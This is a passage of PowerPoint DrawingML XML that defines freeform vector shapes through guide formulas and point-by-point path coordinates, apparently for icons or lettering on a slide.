                  <a:gd name="T61" fmla="*/ 179 h 411"/>
                  <a:gd name="T62" fmla="*/ 126 w 720"/>
                  <a:gd name="T63" fmla="*/ 158 h 411"/>
                  <a:gd name="T64" fmla="*/ 436 w 720"/>
                  <a:gd name="T65" fmla="*/ 89 h 411"/>
                  <a:gd name="T66" fmla="*/ 420 w 720"/>
                  <a:gd name="T67" fmla="*/ 22 h 411"/>
                  <a:gd name="T68" fmla="*/ 520 w 720"/>
                  <a:gd name="T69" fmla="*/ 0 h 411"/>
                  <a:gd name="T70" fmla="*/ 530 w 720"/>
                  <a:gd name="T71" fmla="*/ 69 h 411"/>
                  <a:gd name="T72" fmla="*/ 688 w 720"/>
                  <a:gd name="T73" fmla="*/ 37 h 411"/>
                  <a:gd name="T74" fmla="*/ 719 w 720"/>
                  <a:gd name="T75" fmla="*/ 179 h 4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20" h="411">
                    <a:moveTo>
                      <a:pt x="719" y="179"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="562" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="179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" name="Freeform 52"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7402513" y="3316288"/>
                <a:ext cx="285750" cy="160337"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 110 w 793"/>
                  <a:gd name="T1" fmla="*/ 178 h 447"/>
                  <a:gd name="T2" fmla="*/ 110 w 793"/>
                  <a:gd name="T3" fmla="*/ 178 h 447"/>
                  <a:gd name="T4" fmla="*/ 120 w 793"/>
                  <a:gd name="T5" fmla="*/ 210 h 447"/>
                  <a:gd name="T6" fmla="*/ 125 w 793"/>
                  <a:gd name="T7" fmla="*/ 221 h 447"/>
                  <a:gd name="T8" fmla="*/ 136 w 793"/>
                  <a:gd name="T9" fmla="*/ 231 h 447"/>
                  <a:gd name="T10" fmla="*/ 136 w 793"/>
                  <a:gd name="T11" fmla="*/ 231 h 447"/>
                  <a:gd name="T12" fmla="*/ 162 w 793"/>
                  <a:gd name="T13" fmla="*/ 241 h 447"/>
                  <a:gd name="T14" fmla="*/ 194 w 793"/>
                  <a:gd name="T15" fmla="*/ 241 h 447"/>
                  <a:gd name="T16" fmla="*/ 724 w 793"/>
                  <a:gd name="T17" fmla="*/ 0 h 447"/>
                  <a:gd name="T18" fmla="*/ 745 w 793"/>
                  <a:gd name="T19" fmla="*/ 147 h 447"/>
                  <a:gd name="T20" fmla="*/ 378 w 793"/>
                  <a:gd name="T21" fmla="*/ 289 h 447"/>
                  <a:gd name="T22" fmla="*/ 378 w 793"/>
                  <a:gd name="T23" fmla="*/ 294 h 447"/>
                  <a:gd name="T24" fmla="*/ 771 w 793"/>
                  <a:gd name="T25" fmla="*/ 304 h 447"/>
                  <a:gd name="T26" fmla="*/ 792 w 793"/>
                  <a:gd name="T27" fmla="*/ 446 h 447"/>
                  <a:gd name="T28" fmla="*/ 257 w 793"/>
                  <a:gd name="T29" fmla="*/ 394 h 447"/>
                  <a:gd name="T30" fmla="*/ 257 w 793"/>
                  <a:gd name="T31" fmla="*/ 394 h 447"/>
                  <a:gd name="T32" fmla="*/ 194 w 793"/>
                  <a:gd name="T33" fmla="*/ 383 h 447"/>
                  <a:gd name="T34" fmla="*/ 141 w 793"/>
                  <a:gd name="T35" fmla="*/ 373 h 447"/>
                  <a:gd name="T36" fmla="*/ 141 w 793"/>
                  <a:gd name="T37" fmla="*/ 373 h 447"/>
                  <a:gd name="T38" fmla="*/ 99 w 793"/>
                  <a:gd name="T39" fmla="*/ 362 h 447"/>
                  <a:gd name="T40" fmla="*/ 68 w 793"/>
                  <a:gd name="T41" fmla="*/ 347 h 447"/>
                  <a:gd name="T42" fmla="*/ 68 w 793"/>
                  <a:gd name="T43" fmla="*/ 347 h 447"/>
                  <a:gd name="T44" fmla="*/ 47 w 793"/>
                  <a:gd name="T45" fmla="*/ 325 h 447"/>
                  <a:gd name="T46" fmla="*/ 31 w 793"/>
                  <a:gd name="T47" fmla="*/ 294 h 447"/>
                  <a:gd name="T48" fmla="*/ 31 w 793"/>
                  <a:gd name="T49" fmla="*/ 294 h 447"/>
                  <a:gd name="T50" fmla="*/ 15 w 793"/>
                  <a:gd name="T51" fmla="*/ 257 h 447"/>
                  <a:gd name="T52" fmla="*/ 10 w 793"/>
                  <a:gd name="T53" fmla="*/ 215 h 447"/>
                  <a:gd name="T54" fmla="*/ 0 w 793"/>
                  <a:gd name="T55" fmla="*/ 157 h 447"/>
                  <a:gd name="T56" fmla="*/ 104 w 793"/>
                  <a:gd name="T57" fmla="*/ 142 h 447"/>
                  <a:gd name="T58" fmla="*/ 104 w 793"/>
                  <a:gd name="T59" fmla="*/ 142 h 447"/>
                  <a:gd name="T60" fmla="*/ 110 w 793"/>
                  <a:gd name="T61" fmla="*/ 178 h 4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93" h="447">
                    <a:moveTo>
                      <a:pt x="110" y="178"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="178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66" name="Group 165"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4771669" y="3502805"/>
              <a:ext cx="1020094" cy="862247"/>
              <a:chOff x="5356225" y="4513263"/>
              <a:chExt cx="2328863" cy="1968500"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="211" name="Freeform 53"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5356225" y="6210300"/>
                <a:ext cx="177800" cy="271463"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 225 w 494"/>
                  <a:gd name="T1" fmla="*/ 641 h 752"/>
                  <a:gd name="T2" fmla="*/ 283 w 494"/>
                  <a:gd name="T3" fmla="*/ 651 h 752"/>
                  <a:gd name="T4" fmla="*/ 325 w 494"/>
                  <a:gd name="T5" fmla="*/ 635 h 752"/>
                  <a:gd name="T6" fmla="*/ 346 w 494"/>
                  <a:gd name="T7" fmla="*/ 604 h 752"/>
                  <a:gd name="T8" fmla="*/ 352 w 494"/>
                  <a:gd name="T9" fmla="*/ 567 h 752"/>
                  <a:gd name="T10" fmla="*/ 346 w 494"/>
                  <a:gd name="T11" fmla="*/ 520 h 752"/>
                  <a:gd name="T12" fmla="*/ 325 w 494"/>
                  <a:gd name="T13" fmla="*/ 451 h 752"/>
                  <a:gd name="T14" fmla="*/ 299 w 494"/>
                  <a:gd name="T15" fmla="*/ 420 h 752"/>
                  <a:gd name="T16" fmla="*/ 257 w 494"/>
                  <a:gd name="T17" fmla="*/ 409 h 752"/>
                  <a:gd name="T18" fmla="*/ 168 w 494"/>
                  <a:gd name="T19" fmla="*/ 320 h 752"/>
                  <a:gd name="T20" fmla="*/ 236 w 494"/>
                  <a:gd name="T21" fmla="*/ 310 h 752"/>
                  <a:gd name="T22" fmla="*/ 262 w 494"/>
                  <a:gd name="T23" fmla="*/ 284 h 752"/>
                  <a:gd name="T24" fmla="*/ 278 w 494"/>
                  <a:gd name="T25" fmla="*/ 252 h 752"/>
                  <a:gd name="T26" fmla="*/ 278 w 494"/>
                  <a:gd name="T27" fmla="*/ 184 h 752"/>
                  <a:gd name="T28" fmla="*/ 262 w 494"/>
                  <a:gd name="T29" fmla="*/ 126 h 752"/>
                  <a:gd name="T30" fmla="*/ 242 w 494"/>
                  <a:gd name="T31" fmla="*/ 105 h 752"/>
                  <a:gd name="T32" fmla="*/ 194 w 494"/>
                  <a:gd name="T33" fmla="*/ 100 h 752"/>
                  <a:gd name="T34" fmla="*/ 157 w 494"/>
                  <a:gd name="T35" fmla="*/ 115 h 752"/>
                  <a:gd name="T36" fmla="*/ 136 w 494"/>
                  <a:gd name="T37" fmla="*/ 142 h 752"/>
                  <a:gd name="T38" fmla="*/ 131 w 494"/>
                  <a:gd name="T39" fmla="*/ 184 h 752"/>
                  <a:gd name="T40" fmla="*/ 5 w 494"/>
                  <a:gd name="T41" fmla="*/ 252 h 752"/>
                  <a:gd name="T42" fmla="*/ 10 w 494"/>
                  <a:gd name="T43" fmla="*/ 115 h 752"/>
                  <a:gd name="T44" fmla="*/ 58 w 494"/>
                  <a:gd name="T45" fmla="*/ 53 h 752"/>
                  <a:gd name="T46" fmla="*/ 183 w 494"/>
                  <a:gd name="T47" fmla="*/ 5 h 752"/>
                  <a:gd name="T48" fmla="*/ 272 w 494"/>
                  <a:gd name="T49" fmla="*/ 0 h 752"/>
                  <a:gd name="T50" fmla="*/ 346 w 494"/>
                  <a:gd name="T51" fmla="*/ 26 h 752"/>
                  <a:gd name="T52" fmla="*/ 409 w 494"/>
                  <a:gd name="T53" fmla="*/ 115 h 752"/>
                  <a:gd name="T54" fmla="*/ 425 w 494"/>
                  <a:gd name="T55" fmla="*/ 189 h 752"/>
                  <a:gd name="T56" fmla="*/ 409 w 494"/>
                  <a:gd name="T57" fmla="*/ 268 h 752"/>
                  <a:gd name="T58" fmla="*/ 378 w 494"/>
                  <a:gd name="T59" fmla="*/ 310 h 752"/>
                  <a:gd name="T60" fmla="*/ 336 w 494"/>
                  <a:gd name="T61" fmla="*/ 336 h 752"/>
                  <a:gd name="T62" fmla="*/ 399 w 494"/>
                  <a:gd name="T63" fmla="*/ 347 h 752"/>
                  <a:gd name="T64" fmla="*/ 446 w 494"/>
                  <a:gd name="T65" fmla="*/ 378 h 752"/>
                  <a:gd name="T66" fmla="*/ 483 w 494"/>
                  <a:gd name="T67" fmla="*/ 457 h 752"/>
                  <a:gd name="T68" fmla="*/ 493 w 494"/>
                  <a:gd name="T69" fmla="*/ 525 h 752"/>
                  <a:gd name="T70" fmla="*/ 488 w 494"/>
                  <a:gd name="T71" fmla="*/ 604 h 752"/>
                  <a:gd name="T72" fmla="*/ 441 w 494"/>
                  <a:gd name="T73" fmla="*/ 677 h 752"/>
                  <a:gd name="T74" fmla="*/ 383 w 494"/>
                  <a:gd name="T75" fmla="*/ 719 h 752"/>
                  <a:gd name="T76" fmla="*/ 283 w 494"/>
                  <a:gd name="T77" fmla="*/ 745 h 752"/>
                  <a:gd name="T78" fmla="*/ 152 w 494"/>
                  <a:gd name="T79" fmla="*/ 735 h 752"/>
                  <a:gd name="T80" fmla="*/ 89 w 494"/>
                  <a:gd name="T81" fmla="*/ 682 h 752"/>
                  <a:gd name="T82" fmla="*/ 42 w 494"/>
                  <a:gd name="T83" fmla="*/ 556 h 752"/>
                  <a:gd name="T84" fmla="*/ 178 w 494"/>
                  <a:gd name="T85" fmla="*/ 530 h 7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94" h="752">
                    <a:moveTo>
                      <a:pt x="215" y="625"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="215" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="745"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="745"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="745"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="735"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="625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2" name="Freeform 54"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5568950" y="6384925"/>
                <a:ext cx="60325" cy="68263"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 168 w 169"/>
                  <a:gd name="T1" fmla="*/ 163 h 190"/>
                  <a:gd name="T2" fmla="*/ 37 w 169"/>
                  <a:gd name="T3" fmla="*/ 189 h 190"/>
                  <a:gd name="T4" fmla="*/ 0 w 169"/>
                  <a:gd name="T5" fmla="*/ 32 h 190"/>
                  <a:gd name="T6" fmla="*/ 137 w 169"/>
                  <a:gd name="T7" fmla="*/ 0 h 190"/>
                  <a:gd name="T8" fmla="*/ 168 w 169"/>
                  <a:gd name="T9" fmla="*/ 163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9" h="190">
                    <a:moveTo>
                      <a:pt x="168" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="37" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="163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3" name="Freeform 55"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5692775" y="6080125"/>
                <a:ext cx="307975" cy="328613"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 210 w 857"/>
                  <a:gd name="T1" fmla="*/ 136 h 914"/>
                  <a:gd name="T2" fmla="*/ 478 w 857"/>
                  <a:gd name="T3" fmla="*/ 603 h 914"/>
                  <a:gd name="T4" fmla="*/ 478 w 857"/>
                  <a:gd name="T5" fmla="*/ 603 h 914"/>
                  <a:gd name="T6" fmla="*/ 415 w 857"/>
                  <a:gd name="T7" fmla="*/ 73 h 914"/>
                  <a:gd name="T8" fmla="*/ 625 w 857"/>
                  <a:gd name="T9" fmla="*/ 0 h 914"/>
                  <a:gd name="T10" fmla="*/ 856 w 857"/>
                  <a:gd name="T11" fmla="*/ 709 h 914"/>
                  <a:gd name="T12" fmla="*/ 725 w 857"/>
                  <a:gd name="T13" fmla="*/ 750 h 914"/>
                  <a:gd name="T14" fmla="*/ 541 w 857"/>
                  <a:gd name="T15" fmla="*/ 189 h 914"/>
                  <a:gd name="T16" fmla="*/ 541 w 857"/>
                  <a:gd name="T17" fmla="*/ 189 h 914"/>
                  <a:gd name="T18" fmla="*/ 599 w 857"/>
                  <a:gd name="T19" fmla="*/ 793 h 914"/>
                  <a:gd name="T20" fmla="*/ 488 w 857"/>
                  <a:gd name="T21" fmla="*/ 829 h 914"/>
                  <a:gd name="T22" fmla="*/ 179 w 857"/>
                  <a:gd name="T23" fmla="*/ 304 h 914"/>
                  <a:gd name="T24" fmla="*/ 179 w 857"/>
                  <a:gd name="T25" fmla="*/ 304 h 914"/>
                  <a:gd name="T26" fmla="*/ 363 w 857"/>
